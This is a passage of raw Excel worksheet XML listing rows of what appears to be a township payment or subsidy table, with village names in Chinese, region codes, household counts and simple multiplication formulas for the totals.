      <c r="D640" s="14" t="s">
        <v>1745</v>
      </c>
      <c r="E640" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F640" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G640" s="14">
        <v>1</v>
      </c>
      <c r="H640" s="14">
        <v>340</v>
      </c>
      <c r="I640" s="14">
        <f t="shared" si="27"/>
        <v>340</v>
      </c>
      <c r="J640" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K640" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="641" ht="23" customHeight="1" spans="1:11">
      <c r="A641" s="13" t="s">
        <v>1746</v>
      </c>
      <c r="B641" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C641" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D641" s="14" t="s">
        <v>1747</v>
      </c>
      <c r="E641" s="14" t="s">
        <v>419</v>
      </c>
      <c r="F641" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G641" s="14">
        <v>1</v>
      </c>
      <c r="H641" s="14">
        <v>340</v>
      </c>
      <c r="I641" s="14">
        <f t="shared" si="27"/>
        <v>340</v>
      </c>
      <c r="J641" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K641" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="642" ht="23" customHeight="1" spans="1:11">
      <c r="A642" s="13" t="s">
        <v>1748</v>
      </c>
      <c r="B642" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C642" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D642" s="14" t="s">
        <v>1749</v>
      </c>
      <c r="E642" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F642" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G642" s="14">
        <v>2</v>
      </c>
      <c r="H642" s="14">
        <v>300</v>
      </c>
      <c r="I642" s="14">
        <f t="shared" si="27"/>
        <v>600</v>
      </c>
      <c r="J642" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K642" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="643" ht="23" customHeight="1" spans="1:11">
      <c r="A643" s="13" t="s">
        <v>1750</v>
      </c>
      <c r="B643" s="14" t="str">
        <f>B642</f>
        <v>城关镇</v>
      </c>
      <c r="C643" s="14" t="str">
        <f>C642</f>
        <v>城关西北</v>
      </c>
      <c r="D643" s="15" t="s">
        <v>1751</v>
      </c>
      <c r="E643" s="15" t="s">
        <v>584</v>
      </c>
      <c r="F643" s="14" t="str">
        <f>F642</f>
        <v>4113210106</v>
      </c>
      <c r="G643" s="14"/>
      <c r="H643" s="14"/>
      <c r="I643" s="14"/>
      <c r="J643" s="14"/>
      <c r="K643" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="644" ht="23" customHeight="1" spans="1:11">
      <c r="A644" s="13" t="s">
        <v>1752</v>
      </c>
      <c r="B644" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C644" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D644" s="14" t="s">
        <v>1753</v>
      </c>
      <c r="E644" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F644" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G644" s="14">
        <v>1</v>
      </c>
      <c r="H644" s="14">
        <v>340</v>
      </c>
      <c r="I644" s="14">
        <f>H644*G644</f>
        <v>340</v>
      </c>
      <c r="J644" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K644" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="645" ht="23" customHeight="1" spans="1:11">
      <c r="A645" s="13" t="s">
        <v>1754</v>
      </c>
      <c r="B645" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C645" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D645" s="14" t="s">
        <v>1755</v>
      </c>
      <c r="E645" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F645" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G645" s="14">
        <v>1</v>
      </c>
      <c r="H645" s="14">
        <v>340</v>
      </c>
      <c r="I645" s="14">
        <f>H645*G645</f>
        <v>340</v>
      </c>
      <c r="J645" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K645" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="646" ht="23" customHeight="1" spans="1:11">
      <c r="A646" s="13" t="s">
        <v>1756</v>
      </c>
      <c r="B646" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C646" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D646" s="14" t="s">
        <v>1757</v>
      </c>
      <c r="E646" s="14" t="s">
        <v>1758</v>
      </c>
      <c r="F646" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G646" s="14">
        <v>1</v>
      </c>
      <c r="H646" s="14">
        <v>340</v>
      </c>
      <c r="I646" s="14">
        <f>H646*G646</f>
        <v>340</v>
      </c>
      <c r="J646" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K646" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="647" ht="23" customHeight="1" spans="1:11">
      <c r="A647" s="13" t="s">
        <v>1759</v>
      </c>
      <c r="B647" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C647" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D647" s="14" t="s">
        <v>1760</v>
      </c>
      <c r="E647" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F647" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G647" s="14">
        <v>2</v>
      </c>
      <c r="H647" s="14">
        <v>300</v>
      </c>
      <c r="I647" s="14">
        <f>H647*G647</f>
        <v>600</v>
      </c>
      <c r="J647" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K647" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="648" ht="23" customHeight="1" spans="1:11">
      <c r="A648" s="13" t="s">
        <v>1761</v>
      </c>
      <c r="B648" s="14" t="str">
        <f>B647</f>
        <v>城关镇</v>
      </c>
      <c r="C648" s="14" t="str">
        <f>C647</f>
        <v>城关中华</v>
      </c>
      <c r="D648" s="22" t="s">
        <v>1762</v>
      </c>
      <c r="E648" s="22" t="s">
        <v>1763</v>
      </c>
      <c r="F648" s="14" t="str">
        <f>F647</f>
        <v>4113210108</v>
      </c>
      <c r="G648" s="14"/>
      <c r="H648" s="14"/>
      <c r="I648" s="14"/>
      <c r="J648" s="14"/>
      <c r="K648" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="649" ht="23" customHeight="1" spans="1:11">
      <c r="A649" s="13" t="s">
        <v>1764</v>
      </c>
      <c r="B649" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C649" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D649" s="14" t="s">
        <v>1765</v>
      </c>
      <c r="E649" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F649" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G649" s="14">
        <v>1</v>
      </c>
      <c r="H649" s="14">
        <v>340</v>
      </c>
      <c r="I649" s="14">
        <f>H649*G649</f>
        <v>340</v>
      </c>
      <c r="J649" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K649" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="650" ht="23" customHeight="1" spans="1:11">
      <c r="A650" s="13" t="s">
        <v>1766</v>
      </c>
      <c r="B650" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C650" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D650" s="14" t="s">
        <v>1767</v>
      </c>
      <c r="E650" s="14" t="s">
        <v>1768</v>
      </c>
      <c r="F650" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G650" s="14">
        <v>1</v>
      </c>
      <c r="H650" s="14">
        <v>340</v>
      </c>
      <c r="I650" s="14">
        <f>H650*G650</f>
        <v>340</v>
      </c>
      <c r="J650" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K650" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="651" ht="23" customHeight="1" spans="1:11">
      <c r="A651" s="13" t="s">
        <v>1769</v>
      </c>
      <c r="B651" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C651" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D651" s="14" t="s">
        <v>1770</v>
      </c>
      <c r="E651" s="14" t="s">
        <v>1771</v>
      </c>
      <c r="F651" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G651" s="14">
        <v>2</v>
      </c>
      <c r="H651" s="14">
        <v>300</v>
      </c>
      <c r="I651" s="14">
        <f>H651*G651</f>
        <v>600</v>
      </c>
      <c r="J651" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K651" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="652" ht="23" customHeight="1" spans="1:11">
      <c r="A652" s="13" t="s">
        <v>1772</v>
      </c>
      <c r="B652" s="14" t="str">
        <f>B651</f>
        <v>城关镇</v>
      </c>
      <c r="C652" s="14" t="str">
        <f>C651</f>
        <v>城关中华</v>
      </c>
      <c r="D652" s="15" t="s">
        <v>1773</v>
      </c>
      <c r="E652" s="15" t="s">
        <v>1774</v>
      </c>
      <c r="F652" s="14" t="str">
        <f>F651</f>
        <v>4113210108</v>
      </c>
      <c r="G652" s="14"/>
      <c r="H652" s="14"/>
      <c r="I652" s="14"/>
      <c r="J652" s="14"/>
      <c r="K652" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="653" ht="23" customHeight="1" spans="1:11">
      <c r="A653" s="13" t="s">
        <v>1775</v>
      </c>
      <c r="B653" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C653" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D653" s="14" t="s">
        <v>1776</v>
      </c>
      <c r="E653" s="14" t="s">
        <v>1633</v>
      </c>
      <c r="F653" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G653" s="14">
        <v>1</v>
      </c>
      <c r="H653" s="14">
        <v>340</v>
      </c>
      <c r="I653" s="14">
        <f>H653*G653</f>
        <v>340</v>
      </c>
      <c r="J653" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K653" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="654" ht="23" customHeight="1" spans="1:11">
      <c r="A654" s="13" t="s">
        <v>1777</v>
      </c>
      <c r="B654" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C654" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D654" s="14" t="s">
        <v>1778</v>
      </c>
      <c r="E654" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F654" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G654" s="14">
        <v>2</v>
      </c>
      <c r="H654" s="14">
        <v>300</v>
      </c>
      <c r="I654" s="14">
        <f>H654*G654</f>
        <v>600</v>
      </c>
      <c r="J654" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K654" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="655" ht="23" customHeight="1" spans="1:11">
      <c r="A655" s="13" t="s">
        <v>1779</v>
      </c>
      <c r="B655" s="14" t="str">
        <f>B654</f>
        <v>城关镇</v>
      </c>
      <c r="C655" s="14" t="str">
        <f>C654</f>
        <v>城关中华</v>
      </c>
      <c r="D655" s="13" t="s">
        <v>1780</v>
      </c>
      <c r="E655" s="13" t="s">
        <v>584</v>
      </c>
      <c r="F655" s="14" t="str">
        <f>F654</f>
        <v>4113210108</v>
      </c>
      <c r="G655" s="14"/>
      <c r="H655" s="14"/>
      <c r="I655" s="14"/>
      <c r="J655" s="14"/>
      <c r="K655" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="656" ht="23" customHeight="1" spans="1:11">
      <c r="A656" s="13" t="s">
        <v>1781</v>
      </c>
      <c r="B656" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C656" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D656" s="14" t="s">
        <v>1782</v>
      </c>
      <c r="E656" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F656" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G656" s="14">
        <v>1</v>
      </c>
      <c r="H656" s="14">
        <v>340</v>
      </c>
      <c r="I656" s="14">
        <f>H656*G656</f>
        <v>340</v>
      </c>
      <c r="J656" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K656" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="657" ht="23" customHeight="1" spans="1:11">
      <c r="A657" s="13" t="s">
        <v>1783</v>
      </c>
      <c r="B657" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C657" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D657" s="14" t="s">
        <v>1784</v>
      </c>
      <c r="E657" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F657" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G657" s="14">
        <v>1</v>
      </c>
      <c r="H657" s="14">
        <v>340</v>
      </c>
      <c r="I657" s="14">
        <f>H657*G657</f>
        <v>340</v>
      </c>
      <c r="J657" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K657" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="658" ht="23" customHeight="1" spans="1:11">
      <c r="A658" s="13" t="s">
        <v>1785</v>
      </c>
      <c r="B658" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C658" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D658" s="14" t="s">
        <v>1786</v>
      </c>
      <c r="E658" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F658" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G658" s="14">
        <v>1</v>
      </c>
      <c r="H658" s="14">
        <v>340</v>
      </c>
      <c r="I658" s="14">
        <f>H658*G658</f>
        <v>340</v>
      </c>
      <c r="J658" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K658" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="659" ht="23" customHeight="1" spans="1:11">
      <c r="A659" s="13" t="s">
        <v>1787</v>
      </c>
      <c r="B659" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C659" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D659" s="14" t="s">
        <v>1788</v>
      </c>
      <c r="E659" s="14" t="s">
        <v>1789</v>
      </c>
      <c r="F659" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G659" s="14">
        <v>2</v>
      </c>
      <c r="H659" s="14">
        <v>300</v>
      </c>
      <c r="I659" s="14">
        <f>H659*G659</f>
        <v>600</v>
      </c>
      <c r="J659" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K659" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="660" ht="23" customHeight="1" spans="1:11">
      <c r="A660" s="13" t="s">
        <v>1790</v>
      </c>
      <c r="B660" s="14" t="str">
        <f>B659</f>
        <v>城关镇</v>
      </c>
      <c r="C660" s="14" t="str">
        <f>C659</f>
        <v>城关中华</v>
      </c>
      <c r="D660" s="18" t="s">
        <v>1791</v>
      </c>
      <c r="E660" s="18" t="s">
        <v>1792</v>
      </c>
      <c r="F660" s="14" t="str">
        <f>F659</f>
        <v>4113210108</v>
      </c>
      <c r="G660" s="14"/>
      <c r="H660" s="14"/>
      <c r="I660" s="14"/>
      <c r="J660" s="14"/>
      <c r="K660" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="661" ht="23" customHeight="1" spans="1:11">
      <c r="A661" s="13" t="s">
        <v>1793</v>
      </c>
      <c r="B661" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C661" s="14" t="s">
        <v>1722</v>
      </c>
      <c r="D661" s="14" t="s">
        <v>1794</v>
      </c>
      <c r="E661" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F661" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G661" s="14">
        <v>1</v>
      </c>
      <c r="H661" s="14">
        <v>340</v>
      </c>
      <c r="I661" s="14">
        <f>H661*G661</f>
        <v>340</v>
      </c>
      <c r="J661" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K661" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="662" ht="23" customHeight="1" spans="1:11">
      <c r="A662" s="13" t="s">
        <v>1795</v>
      </c>
      <c r="B662" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C662" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D662" s="14" t="s">
        <v>1796</v>
      </c>
      <c r="E662" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F662" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G662" s="14">
        <v>1</v>
      </c>
      <c r="H662" s="14">
        <v>340</v>
      </c>
      <c r="I662" s="14">
        <f>H662*G662</f>
        <v>340</v>
      </c>
      <c r="J662" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K662" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="663" ht="23" customHeight="1" spans="1:11">
      <c r="A663" s="13" t="s">
        <v>1797</v>
      </c>
      <c r="B663" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C663" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D663" s="14" t="s">
        <v>1798</v>
      </c>
      <c r="E663" s="14" t="s">
        <v>1799</v>
      </c>
      <c r="F663" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G663" s="14">
        <v>3</v>
      </c>
      <c r="H663" s="14">
        <v>265</v>
      </c>
      <c r="I663" s="14">
        <f>H663*G663</f>
        <v>795</v>
      </c>
      <c r="J663" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K663" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="664" ht="23" customHeight="1" spans="1:11">
      <c r="A664" s="13" t="s">
        <v>1800</v>
      </c>
      <c r="B664" s="14" t="str">
        <f>B663</f>
        <v>城关镇</v>
      </c>
      <c r="C664" s="14" t="str">
        <f>C663</f>
        <v>城关西北</v>
      </c>
      <c r="D664" s="13" t="s">
        <v>1801</v>
      </c>
      <c r="E664" s="13" t="s">
        <v>1802</v>
      </c>
      <c r="F664" s="14" t="str">
        <f>F663</f>
        <v>4113210106</v>
      </c>
      <c r="G664" s="14"/>
      <c r="H664" s="14"/>
      <c r="I664" s="14"/>
      <c r="J664" s="14"/>
      <c r="K664" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="665" ht="23" customHeight="1" spans="1:11">
      <c r="A665" s="13" t="s">
        <v>1803</v>
      </c>
      <c r="B665" s="14" t="str">
        <f>B664</f>
        <v>城关镇</v>
      </c>
      <c r="C665" s="14" t="str">
        <f>C664</f>
        <v>城关西北</v>
      </c>
      <c r="D665" s="13" t="s">
        <v>1804</v>
      </c>
      <c r="E665" s="18" t="s">
        <v>1805</v>
      </c>
      <c r="F665" s="14" t="str">
        <f>F664</f>
        <v>4113210106</v>
      </c>
      <c r="G665" s="14"/>
      <c r="H665" s="14"/>
      <c r="I665" s="14"/>
      <c r="J665" s="14"/>
      <c r="K665" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="666" ht="23" customHeight="1" spans="1:11">
      <c r="A666" s="13" t="s">
        <v>1806</v>
      </c>
      <c r="B666" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C666" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D666" s="14" t="s">
        <v>1807</v>
      </c>
      <c r="E666" s="14" t="s">
        <v>1702</v>
      </c>
      <c r="F666" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G666" s="14">
        <v>1</v>
      </c>
      <c r="H666" s="14">
        <v>340</v>
      </c>
      <c r="I666" s="14">
        <f>H666*G666</f>
        <v>340</v>
      </c>
      <c r="J666" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K666" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="667" ht="23" customHeight="1" spans="1:11">
      <c r="A667" s="13" t="s">
        <v>1808</v>
      </c>
      <c r="B667" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C667" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D667" s="14" t="s">
        <v>1809</v>
      </c>
      <c r="E667" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F667" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G667" s="14">
        <v>1</v>
      </c>
      <c r="H667" s="14">
        <v>340</v>
      </c>
      <c r="I667" s="14">
        <f>H667*G667</f>
        <v>340</v>
      </c>
      <c r="J667" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K667" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="668" ht="23" customHeight="1" spans="1:11">
      <c r="A668" s="13" t="s">
        <v>1810</v>
      </c>
      <c r="B668" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C668" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D668" s="14" t="s">
        <v>1811</v>
      </c>
      <c r="E668" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F668" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G668" s="14">
        <v>1</v>
      </c>
      <c r="H668" s="14">
        <v>340</v>
      </c>
      <c r="I668" s="14">
        <f>H668*G668</f>
        <v>340</v>
      </c>
      <c r="J668" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K668" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="669" ht="23" customHeight="1" spans="1:11">
      <c r="A669" s="13" t="s">
        <v>1812</v>
      </c>
      <c r="B669" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C669" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D669" s="14" t="s">
        <v>1814</v>
      </c>
      <c r="E669" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F669" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G669" s="14">
        <v>1</v>
      </c>
      <c r="H669" s="14">
        <v>340</v>
      </c>
      <c r="I669" s="14">
        <f>H669*G669</f>
        <v>340</v>
      </c>
      <c r="J669" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K669" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="670" ht="23" customHeight="1" spans="1:11">
      <c r="A670" s="13" t="s">
        <v>1815</v>
      </c>
      <c r="B670" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C670" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D670" s="14" t="s">
        <v>1816</v>
      </c>
      <c r="E670" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F670" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G670" s="14">
        <v>2</v>
      </c>
      <c r="H670" s="14">
        <v>300</v>
      </c>
      <c r="I670" s="14">
        <f>H670*G670</f>
        <v>600</v>
      </c>
      <c r="J670" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K670" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="671" ht="23" customHeight="1" spans="1:11">
      <c r="A671" s="13" t="s">
        <v>1817</v>
      </c>
      <c r="B671" s="14" t="str">
        <f>B670</f>
        <v>城关镇</v>
      </c>
      <c r="C671" s="14" t="str">
        <f>C670</f>
        <v>城关北外</v>
      </c>
      <c r="D671" s="13" t="s">
        <v>1818</v>
      </c>
      <c r="E671" s="13" t="s">
        <v>1819</v>
      </c>
      <c r="F671" s="14" t="str">
        <f>F670</f>
        <v>4113210102</v>
      </c>
      <c r="G671" s="14"/>
      <c r="H671" s="14"/>
      <c r="I671" s="14"/>
      <c r="J671" s="14"/>
      <c r="K671" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="672" ht="23" customHeight="1" spans="1:11">
      <c r="A672" s="13" t="s">
        <v>1820</v>
      </c>
      <c r="B672" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C672" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D672" s="14" t="s">
        <v>1821</v>
      </c>
      <c r="E672" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F672" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G672" s="14">
        <v>1</v>
      </c>
      <c r="H672" s="14">
        <v>340</v>
      </c>
      <c r="I672" s="14">
        <f>H672*G672</f>
        <v>340</v>
      </c>
      <c r="J672" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K672" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="673" ht="23" customHeight="1" spans="1:11">
      <c r="A673" s="13" t="s">
        <v>1822</v>
      </c>
      <c r="B673" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C673" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D673" s="14" t="s">
        <v>1823</v>
      </c>
      <c r="E673" s="14" t="s">
        <v>392</v>
      </c>
      <c r="F673" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G673" s="14">
        <v>1</v>
      </c>
      <c r="H673" s="14">
        <v>340</v>
      </c>
      <c r="I673" s="14">
        <f>H673*G673</f>
        <v>340</v>
      </c>
      <c r="J673" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K673" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="674" ht="23" customHeight="1" spans="1:11">
      <c r="A674" s="13" t="s">
        <v>1824</v>
      </c>
      <c r="B674" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C674" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D674" s="14" t="s">
        <v>1825</v>
      </c>
      <c r="E674" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F674" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G674" s="14">
        <v>1</v>
      </c>
      <c r="H674" s="14">
        <v>340</v>
      </c>
      <c r="I674" s="14">
        <f>H674*G674</f>
        <v>340</v>
      </c>
      <c r="J674" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K674" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="675" ht="23" customHeight="1" spans="1:11">
      <c r="A675" s="13" t="s">
        <v>1826</v>
      </c>
      <c r="B675" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C675" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D675" s="14" t="s">
        <v>1827</v>
      </c>
      <c r="E675" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F675" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G675" s="14">
        <v>2</v>
      </c>
      <c r="H675" s="14">
        <v>300</v>
      </c>
      <c r="I675" s="14">
        <f>H675*G675</f>
        <v>600</v>
      </c>
      <c r="J675" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K675" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="676" ht="23" customHeight="1" spans="1:11">
      <c r="A676" s="13" t="s">
        <v>1828</v>
      </c>
      <c r="B676" s="14" t="str">
        <f>B675</f>
        <v>城关镇</v>
      </c>
      <c r="C676" s="14" t="str">
        <f>C675</f>
        <v>城关北外</v>
      </c>
      <c r="D676" s="13" t="s">
        <v>1829</v>
      </c>
      <c r="E676" s="13" t="s">
        <v>548</v>
      </c>
      <c r="F676" s="14" t="str">
        <f>F675</f>
        <v>4113210102</v>
      </c>
      <c r="G676" s="14"/>
      <c r="H676" s="14"/>
      <c r="I676" s="14"/>
      <c r="J676" s="14"/>
      <c r="K676" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="677" ht="23" customHeight="1" spans="1:11">
      <c r="A677" s="13" t="s">
        <v>1830</v>
      </c>
      <c r="B677" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C677" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D677" s="14" t="s">
        <v>1831</v>
      </c>
      <c r="E677" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F677" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G677" s="14">
        <v>1</v>
      </c>
      <c r="H677" s="14">
        <v>340</v>
      </c>
      <c r="I677" s="14">
        <f t="shared" ref="I677:I690" si="28">H677*G677</f>
        <v>340</v>
      </c>
      <c r="J677" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K677" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="678" ht="23" customHeight="1" spans="1:11">
      <c r="A678" s="13" t="s">
        <v>1832</v>
      </c>
      <c r="B678" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C678" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D678" s="14" t="s">
        <v>1833</v>
      </c>
      <c r="E678" s="14" t="s">
        <v>560</v>
      </c>
      <c r="F678" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G678" s="14">
        <v>1</v>
      </c>
      <c r="H678" s="14">
        <v>340</v>
      </c>
      <c r="I678" s="14">
        <f t="shared" si="28"/>
        <v>340</v>
      </c>
      <c r="J678" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K678" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="679" ht="23" customHeight="1" spans="1:11">
      <c r="A679" s="13" t="s">
        <v>1834</v>
      </c>
      <c r="B679" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C679" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D679" s="14" t="s">
        <v>1835</v>
      </c>
      <c r="E679" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F679" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G679" s="14">
        <v>1</v>
      </c>
      <c r="H679" s="14">
        <v>340</v>
      </c>
      <c r="I679" s="14">
        <f t="shared" si="28"/>
        <v>340</v>
      </c>
      <c r="J679" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K679" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="680" ht="23" customHeight="1" spans="1:11">
      <c r="A680" s="13" t="s">
        <v>1836</v>
      </c>
      <c r="B680" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C680" s="14" t="s">
        <v>1739</v>
      </c>
      <c r="D680" s="14" t="s">
        <v>1837</v>
      </c>
      <c r="E680" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F680" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G680" s="14">
        <v>1</v>
      </c>
